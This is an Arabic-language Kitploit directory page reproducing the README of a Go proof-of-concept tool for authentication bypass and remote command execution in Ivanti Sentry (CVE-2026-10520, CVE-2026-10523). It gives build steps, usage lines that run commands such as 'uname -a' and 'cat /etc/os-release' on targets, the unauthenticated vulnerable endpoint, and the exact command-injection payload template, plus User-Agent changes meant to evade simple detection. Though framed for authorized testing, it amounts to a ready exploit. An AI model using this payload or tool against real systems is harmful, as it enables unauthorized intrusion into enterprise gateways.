Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/gagaltotal/cve-2026-10523-ivanti-sentry
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالمصادقة
GitHubgagaltotal/cve-2026-10523-ivanti-sentry

CVE-2026-10523-Ivanti-sentry

أداة كشف إثبات المفهوم لثغرات تجاوز المصادقة وتنفيذ التعليمات البرمجية عن بُعد في Ivanti Sentry (CVE-2026-10520، CVE-2026-10523). ترسل طلبات API مصممة لتنفيذ أوامر النظام والتحقق من النشرات الضعيفة.

عرض المستودعالموقع الإلكتروني
313منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-10523 - أداة كشف تنفيذ الأكواد عن بُعد في Ivanti Sentry

أداة شاملة لإثبات المفهوم للكشف عن ثغرات Ivanti Sentry المتعلقة بتجاوز المصادقة وتنفيذ الأكواد عن بُعد. تحدد هذه الأداة الأنظمة المعرضة لـ CVE-2026-10520 و CVE-2026-10523.

نظرة عامة

صُمم هذا المشروع لكشف والتحقق مما إذا كانت نسخة Ivanti Sentry معرضة لثغرات حرجة في تجاوز المصادقة وتنفيذ الأكواد عن بُعد. ترسل الأداة رسائل مصممة خصيصًا عبر واجهة API الخاصة بـ Ivanti Sentry لتنفيذ أوامر النظام واستخراج النتائج، مما يسمح للباحثين الأمنيين ومختبري الاختراق بتحديد النشرات المعرضة للخطر.

تفاصيل الثغرات

CVE-2026-10520

ثغرة تجاوز المصادقة في Ivanti Sentry تسمح بالوصول غير المصادق إلى نقاط نهاية API المقيدة.

CVE-2026-10523

ثغرة تنفيذ أكواد عن بُعد في Ivanti Sentry تسمح بتنفيذ أوامر نظام عشوائية من خلال واجهة API للرسائل عند دمجها مع تجاوز المصادقة.

الميزات

  • كشف غير مصادق لنسخ Ivanti Sentry المعرضة للخطر
  • إمكانية تنفيذ أوامر النظام للتحقق من إثبات المفهوم
  • دعم اتصالات HTTP و HTTPS مع تجاوز التحقق من TLS
  • دعم الوكيل (Proxy) للاختبار عبر الوسائط
  • استخراج نظيف لمخرجات الأوامر من استجابات XML
  • معالجة آمنة للأخطاء مع تغذية راجعة إعلامية
  • مهلة زمنية قابلة للتكوين وحدود لحجم الاستجابة
  • المتطلبات

    • Go 1.26.4 أو أعلى
    • وصول شبكي إلى نسخة Ivanti Sentry المستهدفة
    • عنوان URL صالح للهدف مع البروتوكول (HTTP أو HTTPS)

    التثبيت

    استنساخ المستودع والانتقال إلى دليل المشروع:

    root@kitploit:~
    git clone https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry
    cd CVE-2026-10523-Ivanti-sentry
    

    الحصول على التهيئة ومكتبة الحزمة

    root@kitploit:~
    go mod init CVE-2026-10523-Ivanti-sentry
    go mod tidy
    

    بناء الملف التنفيذي:

    root@kitploit:~
    go build -o tot_poc tot_poc.go
    

    الاستخدام

    Screen Capture

    تتطلب الأداة معلمتين إجباريتين: عنوان URL الهدف والأمر المراد تنفيذه.

    الاستخدام الأساسي

    Screen Capture

    تشغيل أمر بسيط على الهدف:

    root@kitploit:~
    ./tot_poc -url https://target.example.com:8443 -cmd "uname -a"
    

    خيارات سطر الأوامر

    • -url (إجباري): عنوان URL الأساسي للهدف مع البروتوكول (مثال: https://127.0.0.1:8443)
    • -cmd (إجباري): الأمر الذي سيتم تنفيذه للكشف عن الثغرة (مثال: "uname -a"، "id"، "whoami")
    • -p أو -proxy (اختياري): عنوان الوكيل والمنفذ لتوجيه الحركة (مثال: 127.0.0.1:8080)

    أمثلة الاستخدام

    Screen Capture

    كشف الثغرة بأمر معلومات نظام بسيط:

    root@kitploit:~
    ./tot_poc -url https://192.168.1.100:8443 -cmd "uname -a"
    

    تشغيل مع إعدادات الوكيل:

    root@kitploit:~
    ./tot_poc -url https://target.example.com:8443 -cmd "whoami" -proxy 127.0.0.1:8080
    

    تنفيذ أمر لاستخراج معلومات النظام:

    root@kitploit:~
    ./tot_poc -url https://sentry-instance.internal:8443 -cmd "cat /etc/os-release"
    

    المخرجات

    ستعرض الأداة:

    1. لافتة تحتوي على معلومات الثغرة
    2. عنوان URL الهدف والأمر وتكوين الوكيل (إن وجد)
    3. رسائل الحالة في الوقت الفعلي تشير إلى تقدم الطلب
    4. نتائج تنفيذ الأمر إذا كان الهدف معرضًا للخطر
    5. رسائل خطأ إذا لم يكن الهدف معرضًا للخطر أو فشل الاتصال

    مخرجات الكشف الناجحة

    root@kitploit:~
    Target: https://192.168.1.100:8443
    Command: uname -a
    
    [+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
    [+] Target appears to be vulnerable.
    
    Command output:
    Linux sentry-server 5.10.0-8-generic x86_64 GNU/Linux
    

    مخرجات الكشف الفاشلة

    root@kitploit:~
    Target: https://192.168.1.100:8443
    Command: uname -a
    
    [+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
    [-] Target does not appear to be vulnerable.
    

    التفاصيل الفنية

    ناقل الهجوم

    تستغل الأداة نقطة النهاية /mics/api/v2/sentry/mics-config/handleMessage التي يمكن الوصول إليها دون مصادقة. يتم إنشاء الحمولة على النحو التالي:

    root@kitploit:~
    message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>[COMMAND]</reqandres></commandexec>
    

    تحتوي الاستجابة على مخرجات الأمر بتنسيق XML داخل علامة النجاح.

    الميزات الأمنية

    • تجاوز التحقق من TLS لاختبار الشهادات الذاتية التوقيع
    • مهلة HTTP قابلة للتكوين لمنع تعليق الطلبات
    • تحديد حجم الاستجابة (10 ميجابايت) لمنع استنزاف الذاكرة
    • معالجة مناسبة للأخطاء للاستجابات المشوهة
    • تزييل وكيل المستخدم (User-Agent) لتجنب آليات الكشف البسيطة

    كيف يعمل

    1. تحليل وسائط سطر الأوامر للحصول على عنوان URL الهدف والأمر
    2. إنشاء عميل HTTP مع إعدادات الوكيل الاختيارية
    3. بناء الحمولة باستخدام الأمر المقدم من المستخدم
    4. إرسال طلب POST إلى نقطة النهاية المعرضة للخطر
    5. استخراج مخرجات الأمر من بنية استجابة XML
    6. عرض النتائج أو رسائل الخطأ وفقًا لذلك

    إخلاء المسؤولية

    هذه الأداة مقدمة لأغراض الاختبار الأمني المصرح به والبحث فقط. يتحمل المستخدمون وحدهم مسؤولية ضمان حصولهم على إذن مناسب قبل اختبار أي أنظمة. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. لا يتحمل المؤلفون أي مسؤولية عن إساءة الاستخدام أو الضرر الناتج عن هذه الأداة.

    المتطلبات والقيود

    • يجب أن يكون الهدف نسخة Ivanti Sentry معرضة للخطر
    • الاتصال الشبكي بالنظام الهدف مطلوب
    • المهلة الافتراضية هي 10 ثوانٍ لكل طلب
    • الحد الأقصى لحجم الاستجابة هو 10 ميجابايت
    • فعال فقط على الأنظمة التي تشغل إصدارات معرضة للخطر من Ivanti Sentry
    • تم تعطيل التحقق من شهادة TLS لأغراض الاختبار

    المؤلف

    GhostGTR666 - Gagaltotal666

    المستودع

    https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry

    الترخيص

    هذا المشروع مقدم كما هو لأغراض البحث الأمني والتعليم.

    المراجع

    • CVE-2026-10520: تجاوز المصادقة في Ivanti Sentry
    • CVE-2026-10523: تنفيذ الأكواد عن بُعد في Ivanti Sentry
    تنزيل الأداة